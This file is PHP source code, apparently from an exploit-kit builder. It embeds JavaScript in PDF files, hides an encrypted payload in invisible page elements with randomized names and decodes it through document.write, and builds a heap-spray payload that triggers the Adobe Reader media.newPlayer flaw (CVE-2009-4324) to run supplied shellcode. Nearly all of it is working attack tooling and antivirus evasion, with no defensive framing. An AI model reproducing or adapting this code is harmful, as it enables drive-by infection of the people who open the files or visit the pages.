function _putjavascript() {
$randoms = Obfuscators::get_random_string_array(15, 30);
$this->_newobj();
$this->n_js=$this->n;
$this->_out('<<');
$this->_out("/Names [($randoms[0]) ".($this->n+1).' 0 R]');
$this->_out('>>');
$this->_out('endobj');
$this->_newobj();
$this->_out('<< /S /JavaScript/JS '.($this->n+1).' 0 R >>');
$this->_out('endobj');
$this->_newobj();
$data = $this->javascript;
$data = gzcompress($data);
$this->_out('<</Filter /FlateDecode /Length '.strlen($data).'>>');
$this->_putstream($data);
$this->_out('endobj');
}
public static function encrypt($original) {
$symb = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
$rnd_split = $symb[rand(0, strlen($symb) - 1)];
$original = Obfuscators::mkcrypt($original, $rnd_split);
$key = Obfuscators::gen_key(rand(40, 60));
$crypt = Obfuscators::crypt_with_key($original, $key);
$ii = 0;
while (strlen($crypt) > 0) {
$pos = rand(50, 590);
$var_array[$ii] = substr($crypt, 0, $pos);
$crypt = substr($crypt, $pos);
$ii++;
}
for ($ii = 0; $ii < count($var_array); $ii++) {
$rnd_div_name = Obfuscators::get_random_string_array(rand(2, 10), count($var_array));
$tag_name = Obfuscators::rand_tag_name();
if (rand(0, 3) == 0) $rn = " \r\n";
else $rn = "";
//$TESTECH.= $var_array[$ii];
$div_echo .= "<$tag_name id ='$rnd_div_name[$ii]'>".$var_array[$ii]."</".$tag_name.">".$rn;
if ($ii == (count($var_array) - 1)) {
$js_array .= '"'.$rnd_div_name[$ii].'"';
}
else {
$js_array .= '"'.$rnd_div_name[$ii].'",';
}
}
$div_echo = "<div style='display: none;'>".$div_echo."</div>";
$js_array = "new Array(".$js_array.");";
$rnd_nm_crypt = Obfuscators::get_random_string_array(rand(3, 10), 19);
$script_body = '';
$script_body .= "<script>";
$script_body .= "var $rnd_nm_crypt[10] = '';";
$script_body .= "var $rnd_nm_crypt[8] = $js_array";
$script_body .= "var $rnd_nm_crypt[12] = '';";
$script_body .= "function $rnd_nm_crypt[7]($rnd_nm_crypt[8],$rnd_nm_crypt[9]) {";
$script_body .= "return $rnd_nm_crypt[9] = document.getElementById($rnd_nm_crypt[8][$rnd_nm_crypt[9]]).innerHTML;}";
$script_body .= "function $rnd_nm_crypt[13] ($rnd_nm_crypt[14]) {";
$script_body .= "return String.fromCharCode($rnd_nm_crypt[14]);}";
$script_body .= "function decryptor($rnd_nm_crypt[15]) {";
$script_body .= "$rnd_nm_crypt[16] = $rnd_nm_crypt[15].split('$rnd_split');";
$script_body .= "for (var i=0;i<$rnd_nm_crypt[16].length-1;i++) {";
$script_body .= "$rnd_nm_crypt[16][i]++;";
$script_body .= "$rnd_nm_crypt[12] += $rnd_nm_crypt[13]($rnd_nm_crypt[16][i]);} return($rnd_nm_crypt[12]);}";
$script_body .= "function $rnd_nm_crypt[17]($rnd_nm_crypt[5]) {";
$script_body .= "var $rnd_nm_crypt[1],$rnd_nm_crypt[2],$rnd_nm_crypt[3],$rnd_nm_crypt[4] = '',";
$script_body .= "$rnd_nm_crypt[6] ='$key';";
$script_body .= "for($rnd_nm_crypt[1] = 0;$rnd_nm_crypt[1]<$rnd_nm_crypt[5].length;$rnd_nm_crypt[1]++){";
$script_body .= "$rnd_nm_crypt[2] = $rnd_nm_crypt[5].charAt($rnd_nm_crypt[1]);";
$script_body .= "$rnd_nm_crypt[3] = $rnd_nm_crypt[6].indexOf($rnd_nm_crypt[2]);";
$script_body .= "if($rnd_nm_crypt[3]>=0) {";
$script_body .= "if($rnd_nm_crypt[3] == 0){ $rnd_nm_crypt[3] = " . (strlen($key) - 1) . ";}";
$script_body .= "else { $rnd_nm_crypt[3] = $rnd_nm_crypt[3] -1;} $rnd_nm_crypt[4] += $rnd_nm_crypt[6].charAt($rnd_nm_crypt[3]);}";
$script_body .= "else { $rnd_nm_crypt[4] += $rnd_nm_crypt[2]; }};";
$script_body .= "xvx = decryptor($rnd_nm_crypt[4]); return xvx;}";
$script_body .= "var $rnd_nm_crypt[11] = $rnd_nm_crypt[8].length;";
$script_body .= "for ($rnd_nm_crypt[9] = 0; $rnd_nm_crypt[11] > $rnd_nm_crypt[9]; $rnd_nm_crypt[9]++) {var $rnd_nm_crypt[10] = $rnd_nm_crypt[10] + $rnd_nm_crypt[7]($rnd_nm_crypt[8],$rnd_nm_crypt[9]);}";
$script_body .= "var $rnd_nm_crypt[9] = $rnd_nm_crypt[17]($rnd_nm_crypt[10]);";
$script_body .= "var gogle=document; var yandex=document;";
$script_body .= "gogle.write('<scri'+'pt>');";
$script_body .= "yandex.write($rnd_nm_crypt[9]);";
$script_body .= "document.write('</sc'+'ript>');";
$script_body .= "</script>";
$script_body = str_replace("\r\n", ' ', $script_body);
$out = $div_echo.$script_body;
return $out;
}
function addNewPlayer($shellcode) {
$randoms = Obfuscators::get_random_string_array(15, 30);
$payload = "";
$payload .= " var $randoms[1] = unescape('$shellcode');";
$payload .= " var $randoms[2] = unescape('\x90\x90\x90\x90\x90\x90\x90\x90');";
$payload .= " var $randoms[3] = unescape('0x0c0c0c0c');";
$payload .= " while($randoms[2].length <= 0x8000) $randoms[2]+=$randoms[2];";
$payload .= " $randoms[2]=$randoms[2].substring(0,0x8000 - $randoms[1].length);";
$payload .= " memory=new Array();";
$payload .= " for(i=0;i<0x2000;i++) { memory[i]= $randoms[2] + $randoms[1]; }";
$payload .= " util.printd('$randoms[4]', new Date());";
$payload .= " util.printd('$randoms[5]', new Date());";
$payload .= " try {this.media.newPlayer(null);} catch(e) {} ";
$payload .= " util.printd($randoms[3], new Date());";
// $this->IncludeJS($payload);
$this->exploits['2009-4324'] = $payload;
}
